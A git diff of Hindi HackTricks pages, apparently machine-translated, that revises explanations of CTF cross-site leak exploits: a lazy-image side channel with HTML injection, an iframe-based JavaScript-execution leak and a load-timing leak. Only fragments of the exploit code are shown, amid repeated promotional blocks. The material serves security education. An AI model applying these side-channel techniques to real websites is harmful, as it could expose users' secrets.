* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने का उपयोग करना चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें**। * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
[**इस एक्सप्लॉइट**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45) में, [**@aszx87410**](https://twitter.com/aszx87410) ने **लेजी इमेज साइड चैनल** तकनीक को HTML इंजेक्शन के साथ मिश्रित किया है जो एक प्रकार की **इवेंट लूप ब्लॉकिंग तकनीक** है चारों ओर से चर्स लीक करने के लिए [**इस एक्सप्लॉइट**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45) में, [**@aszx87410**](https://twitter.com/aszx87410) **लेजी इमेज साइड चैनल** तकनीक को एक HTML इन्जेक्शन के माध्यम से मिश्रित करते हैं जिसमें **घटना लूप अवरोधन तकनीक** का उपयोग करके वर्णों को लीक करते हैं
यह एक **CTF चैलेंज** के लिए एक अलग एक्सप्लॉइट है जिसके बारे में पूरी जानकारी के लिए निम्नलिखित पेज पर टिप्पणी की गई है। चैलेंज के बारे में अधिक जानकारी के लिए देखें: यह एक **विभिन्न एक्सप्लॉइट है CTF चैल** के लिए जिसका पहले से ही टिप्पणी किया गया था। अधिक जानकारी के लिए पृष्ठ की जाँच करें:
{% content-ref url="connection-pool-example.md" %} {% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md) [connection-pool-example.md](connection-pool-example.md)
@ -22,14 +22,14 @@
इस एक्सप्लॉइट के पीछे की विचारधारा है: इस एक्सप्लॉइट के पीछे की विचारधारा है:
* पोस्ट वर्णमाला के क्रम से लोड होते हैं * पोस्ट वर्णमाला के आधार पर लोड होते हैं
* एक **हमलावर** एक **पोस्ट** इंजेक्ट कर सकता है जिसकी शुरुआत **"A"** से होती है, फिर कुछ **HTML टैग** (जैसे एक बड़ा **`<canvas`**) अधिकांश स्क्रीन को भर देगा और कुछ अंतिम **`<img lazy` टैग** चीजें लोड करने के लिए होंगे * एक **हमलावर** एक **पोस्ट** में **"A"** से शुरू कर सकता है, फिर कुछ **HTML टैग** (जैसे एक बड़ा **`<कैनवास`**) ज्यादातर **स्क्रीन** को भर देगा और कुछ अंतिम **`<img आलसी` टैग** को चीजें लोड करने के लिए।
* अगर हमलावर एक "A" की बजाय एक "z" के साथ एक समान पोस्ट इंजेक्ट करता है। तो **फ्लैग** वाली **पोस्ट** पहले दिखाई देगी, फिर इंजेक्ट की गई **पोस्ट** "z" से शुरू होगी और बड़ा **कैनवास** होगा। क्योंकि फ्लैग वाली पोस्ट पहले दिखाई दी, पहला कैनवास सभी स्क्रीन को भरेगा और अंतिम **`<img lazy`** टैग्स इंजेक्टेड स्क्रीन पर दिखाई नहीं देंगे, इसलिए वे लोड नहीं होंगे * अगर हमलावर एक "A" की बजाय **वही पोस्ट इंजेक्ट करता है लेकिन "z" से शुरू करता है।** तो **झंडा वाली पोस्ट** पहले दिखाई देगी, फिर **इंजेक्टेड पोस्ट** "z" के साथ दिखाई देगी और **बड़ा** **कैनवास**। क्योंकि झंडा वाली पोस्ट पहले दिखाई दी, पहला कैनवास सभी स्क्रीन को भरेगा और अंतिम **`<img आलसी`** टैग इंजेक्ट किए गए **स्क्रीन में नहीं दिखाई जाएंगे**, इसलिए वे **लोड नहीं होंगे**
* फिर, **जब** बॉट **पेज तक पहुंचेगा**, हमलावर **fetch रिक्वेस्ट** भेजेगा। * फिर, **जब** बॉट पृष्ठ तक पहुंचता है, **हमलावर** **फेच अनुरोध** भेजेगा।
* अगर पोस्ट में इंजेक्टेड छवियां **लोड हो रही हैं**, तो ये **fetch** रिक्वेस्ट्स **अधिक समय** लेंगे, इसलिए हमलावर को पता चलेगा कि **पोस्ट फ्लैग से पहले** है (वर्णमाला के क्रम से)। * अगर पोस्ट में इंजेक्ट की गई **छवियाँ लोड हो रही हैं**, तो ये **फेच** अनुरोध **अधिक समय** लेंगे, इसलिए हमलावर को पता चलता है कि **पोस्ट झंडे से पहले है** (वर्णमाला के आधार पर)।
* अगर **fetch** रिक्वेस्ट्स **तेज** हैं, तो इसका मतलब है कि **पोस्ट** **फ्लैग से बाद** है। * अगर **फेच** अनुरोध **तेज** हैं, तो इसका मतलब है कि **पोस्ट** **झंडे के बाद** है।
चलिए कोड की जांच करें: कोड की जाँच करें:
```html ```html
<!DOCTYPE html> <!DOCTYPE html>
<html> <html>
@ -154,10 +154,10 @@ resolve(isFound)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) का पता लगाए * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करे
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>

View file

@ -1,14 +1,14 @@
# JavaScript Execution XS Leak # जावास्क्रिप्ट निष्कासन XS लीक
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाएं * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
```javascript ```javascript
@ -30,7 +30,7 @@ window.parent.foo()
res.send(page) res.send(page)
}); });
``` ```
मुख्य पृष्ठ जो पिछले `/guessing` पृष्ठ के लिए iframes उत्पन्न करता है, हर संभावना की परीक्षा करने के लिए मुख्य पृष्ठ जो पिछले `/guessing` पृष्ठ के लिए iframes उत्पन्न करता है ताकि प्रत्येक संभावना का परीक्षण किया जा सके
```html ```html
<html> <html>
<head> <head>
@ -79,10 +79,10 @@ hack.innerHTML = iframe
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके।
</details> </details>

View file

@ -4,20 +4,20 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**. * **अपने हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
**एक्सप्लॉइट लिया गया [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)** **एक्सप्लॉइट लिया गया [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
इस चैलेंज में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए हमलावार ने ध्वज को भेजे गए स्ट्रिंग में ध्वज शामिल है या नहीं, यह माप सकता था इस चैलेंज में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज में शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए एक बड़ी मात्रा में वर्ण डालकर हमलावर यह माप सकता था कि क्या ध्वज भेजे गए स्ट्रिंग में शामिल था या नहीं
{% hint style="warning" %} {% hint style="warning" %}
शुरू में, मैंने ऑब्जेक्ट चौड़ाई और ऊचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह महत्वपूर्ण मालूम हुआ क्योंकि डिफ़ॉल्ट साइज बहुत छोटा है जिससे लोड समय में अंतर नहीं हो सकता। शुरू में, मैंने ऑब्जेक्ट की चौड़ाई और ऊचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह महत्वपूर्ण मालूम हुआ क्योंकि डिफ़ॉल्ट साइज बहुत छोटा है जिससे लोड समय में अंतर नहीं पड़ता।
{% endhint %} {% endhint %}
```html ```html
<!DOCTYPE html> <!DOCTYPE html>
@ -121,7 +121,7 @@ main()
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PRs सबमिट करके।** * **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
@ -56,12 +56,12 @@ document.addEventListener('DOMContentLoaded', main);
``` ```
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
